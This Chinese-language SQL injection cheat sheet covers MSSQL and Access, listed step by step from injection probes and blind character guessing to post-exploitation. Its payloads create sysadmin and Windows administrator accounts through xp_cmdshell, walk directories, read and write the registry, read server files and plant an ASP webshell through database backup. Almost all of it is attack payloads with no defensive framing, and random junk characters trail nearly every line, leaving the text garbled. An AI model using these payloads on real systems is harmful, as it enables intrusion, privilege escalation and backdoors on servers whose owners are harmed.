1.判断是否有注入;and 1=1 ;and 1=2 Nqd9)WQ
2.初步判断是否是mssql ;and user>0 0xCe6{86
PGYx]r
3.注入参数是字符'and [查询条件] and ''=' KZ AF9
5K$<Ad4$b
4.搜索时没过滤参数的'and [查询条件] and '%25'=' >MRuoJ
e(b$LUV
5.判断数据库系统 017n hI
x6Gl|e[jv
;and (select count(*) from sysobjects)>0 mssql 7'{Vh{.
w&VDe(:~
;and (select count(*) from msysobjects)>0 access " L,9.b
_;S~nn
P (Y\l
DZH2U+K
6.猜数据库 ;and (select Count(*) from [数据库名])>0 akCCpnX_d
=9p3^:S
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 eHd7fhW5
9p^gF2?k
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 psz0q|
}mUb1b
9.(1)猜字段的ascii值(access) T;PLUjp}
`Nz`5}8.?
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 "K+EZ%~<
\,v+ejhw
(2)猜字段的ascii值(mssql) #@1(
[io|qLr}\
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 ^/x\HGrw
@+y,E-YTdV
10.测试权限结构(mssql) &Ll&A@yU
`YMd0*
n:1Ijh
1
]-SJ";aU
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- *{Z=)k%
=1
S%E
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- )_4()#3
JB.U&
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- tL<.B
i*!2n1c[
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- -g|ji.
"Y- WY,H
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- 5)h fI7{d
Z`ww[Tbv~
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- WNQ<XBqAw
_ F|}=^Z`
;and 1=(select IS_MEMBER('db_owner'));-- Un
T\6u
{[L('MH2|
apfr>L3
R*S:/s
11.添加mssql和系统的帐户 -R\dg S3
8gt&*;'}*D
;exec master.dbo.sp_addlogin username;-- Z;RUxe|<k
;exec master.dbo.sp_password null,username,password;-- 've[Mx
2\gIjXX"
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- IvI..#EzG
"VU/Ucb7
;exec master.dbo.xp_cmdshell 'net user username password @>V;guJC%
(hQi {
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- >'.: Acn
;ny 9q
;exec master.dbo.xp_cmdshell 'net user username password /add';-- ={N1j<%fh
{ w sT
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- BfVh\lkH
uI%7jA~@
Dh?I
eR6vO5to
12.(1)遍历目录 (+/d*4
g%!U7CM6h
;create table dirs(paths varchar(100), id int) $&KkZ
*kYGXT,f]
;insert dirs exec master.dbo.xp_dirtree 'c:\' i*@PywT"i3
:XG~AR/
;and (select top 1 paths from dirs)>0 N0vECk
0(:SEiz6s
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) K:~tZ
x-%RRm<V
>!a- "
FU>KiBV#
(2)遍历目录 8"ZS|^#
B.~]
7H5"(
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- PJe_qP
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 =+ >>l0=_v
gt02Csdt
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 K5BL4N
}*xjO/Ey
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 NRp
7Zdg314
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 P*~
vWYH9
/sT?p=[.
7}6CUo
[wnp]'+!
13.mssql中的存储过程 y1Z>{SDiq
9!W$S[ABRB
xp_regenumvalues 注册表根键, 子键 A8Fe@$<#8
jnTTj l
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 :Q]"dbY^
#ye`vD
xp_regread 根键,子键,键值名 dpylJ2
<r t$~}
;exec xp_regread O#=%t
0F/[GZ<k
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 {tY1$}R
[xr^t1
xp_regwrite 根键,子键, 值名, 值类型, 值 |l+5E
M\{\WyeX
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 ftR& 5!Wm
tkr&Fs"t+
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 c$7~EP
.'<K$:8@|
xp_regdeletevalue 根键,子键,值名 PgT8
1u
WGUw`sc\
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 L6{gwoZf3
6WGg_x?3
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 P@vUQ
7_76X)gIV
z06,$OYz
prz COw
14.mssql的backup创建webshell 3-{BXht)
-kMw[Y
use model b&&l
2*z~'i
create table cmd(str image); 3,{eH6,O7M
3J
&Ros
insert into cmd(str) values (''); 9|Jv>Ur=)2
\?T9v
backup database model to disk='c:\l.asp'; Dn 0L%?_
=zK4jiM1
QDQ"Sc06
b2UDP W
15.mssql内置函数 )c' 45bD
u5k{.&
;and (select @@version)>0 获得Windows的版本号 {Fw"y %a^
Jp]?tlT
;and user_name()='dbo' 判断当前系统的连接用户是不是sa CMW4Zqau*
U,EoCAm>
;and (select user_name())>0 爆当前系统的连接用户 C:t>u..
a- rR`
;and (select db_name())>0 得到当前连接的数据库 >U{iof<
{jB>]7
T3{~f
?`Yu~a{
16.简洁的webshell K!&W} _@l
$ItmYj.m
use model CE`]X;#y
P|$n
create table cmd(str image); '@.6Rd 8
;kk[x8$
insert into cmd(str) values (''); nwKp8mfP
-!1=S: S
backup database model to disk='g:\wwwtest\l.asp';